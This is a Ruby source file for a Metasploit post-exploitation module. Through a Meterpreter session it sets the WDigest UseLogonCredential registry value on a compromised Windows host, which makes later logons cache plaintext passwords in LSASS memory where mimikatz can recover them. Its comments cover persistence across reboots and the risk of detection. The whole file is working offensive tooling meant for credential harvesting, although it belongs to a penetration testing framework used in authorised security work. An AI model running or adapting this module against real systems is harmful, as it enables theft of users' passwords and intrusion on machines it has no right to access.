Path: blob/master/modules/post/windows/manage/wdigest_caching.rb
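##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post module that toggles WDigest plaintext credential caching on a Windows
# target by writing the UseLogonCredential DWORD under the WDigest
# SecurityProviders key in HKLM.
#
# Operational notes:
# - The write goes to HKLM, so it persists across reboots and outlives the
#   Meterpreter session; run again with ENABLE=false to revert the change.
# - Only logons that happen *after* the value is set are affected (see the
#   module description): nothing already cached in LSASS is changed.
# - Writing under HKLM requires elevated privileges; a failed write is
#   reported as a likely privilege problem rather than a crash.
# - NOTE(review): this registry value is a well-known tampering indicator;
#   assume the write may be alerted on by host monitoring.
class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Registry
  include Msf::Post::Windows::Version

  WDIGEST_REG_LOCATION = 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest'.freeze
  USE_LOGON_CREDENTIAL = 'UseLogonCredential'.freeze

  # Registers module metadata and the single ENABLE option (default true).
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Post Manage WDigest Credential Caching',
        'Description' => %q{
          On Windows 8/2012 or higher, the Digest Security Provider (WDIGEST) is disabled by default. This module enables/disables
          credential caching by adding/changing the value of the UseLogonCredential DWORD under the WDIGEST provider's Registry key.
          Any subsequent logins will allow mimikatz to recover the plain text passwords from the system's memory.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>'],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ]
      )
    )

    register_options(
      [
        OptBool.new('ENABLE', [false, 'Enable the WDigest Credential Cache.', true])
      ]
    )
  end

  # Entry point for the `run` command.
  #
  # Enables or disables WDigest caching according to the ENABLE option.
  # The version threshold is Windows 7 / 2008 R2 (not 8 / 2012): the
  # UseLogonCredential control was backported to those releases, and there
  # the provider defaults to enabled, so setting the value is still
  # meaningful. Older releases are skipped because the value has no effect.
  def run
    print_status("Running module against #{sysinfo['Computer']}")

    version = get_version_info
    if version.build_number < Msf::WindowsVersion::Win7_SP0
      print_status('Older Windows version detected. No need to enable the WDigest Security Provider. Exiting...')
      return
    end

    datastore['ENABLE'] ? wdigest_enable : wdigest_disable
  end

  # Reads the current UseLogonCredential DWORD.
  #
  # @return [Integer, nil] the stored value, or nil when the value is absent
  #   (it is not present by default)
  # @raise aborts the module via fail_with on a Meterpreter registry error
  def get_key
    print_status("Checking if the #{WDIGEST_REG_LOCATION}\\#{USE_LOGON_CREDENTIAL} DWORD exists...")
    begin
      wdvalue = registry_getvaldata(WDIGEST_REG_LOCATION, USE_LOGON_CREDENTIAL)
      print_status("#{USE_LOGON_CREDENTIAL} is set to #{wdvalue}") unless wdvalue.nil?
      wdvalue
    rescue Rex::Post::Meterpreter::RequestError => e
      fail_with(Failure::Unknown, "Unable to access registry key: #{e}")
    end
  end

  # Turns WDigest plaintext caching on (UseLogonCredential = 1).
  def wdigest_enable
    set_use_logon_credential(1, 'enabled')
  end

  # Turns WDigest plaintext caching off (UseLogonCredential = 0).
  def wdigest_disable
    set_use_logon_credential(0, 'disabled')
  end

  private

  # Shared implementation for enable/disable: writes UseLogonCredential as a
  # REG_DWORD with the given value, creating it when absent, and reports the
  # outcome using `state_label` ('enabled' / 'disabled') in the messages.
  # A no-op when the value already holds `value`.
  #
  # @param value [Integer] 1 to enable caching, 0 to disable it
  # @param state_label [String] word used in the status/success messages
  def set_use_logon_credential(value, state_label)
    wdvalue = get_key
    key_exists = !wdvalue.nil?

    if key_exists && wdvalue == value
      print_good("Registry value is already set. WDigest Security Provider is #{state_label}")
      return
    end

    begin
      verb = key_exists ? 'Setting' : 'Creating'
      print_status("#{verb} #{USE_LOGON_CREDENTIAL} DWORD value as #{value}...")
      if registry_setvaldata(WDIGEST_REG_LOCATION, USE_LOGON_CREDENTIAL, value, 'REG_DWORD')
        print_good("WDigest Security Provider #{state_label}")
      else
        # registry_setvaldata returned false: HKLM writes need elevation.
        print_error('Unable to access registry key - insufficient privileges?')
      end
    rescue Rex::Post::Meterpreter::RequestError => e
      fail_with(Failure::Unknown, "Unable to access registry key: #{e}")
    end
  end
end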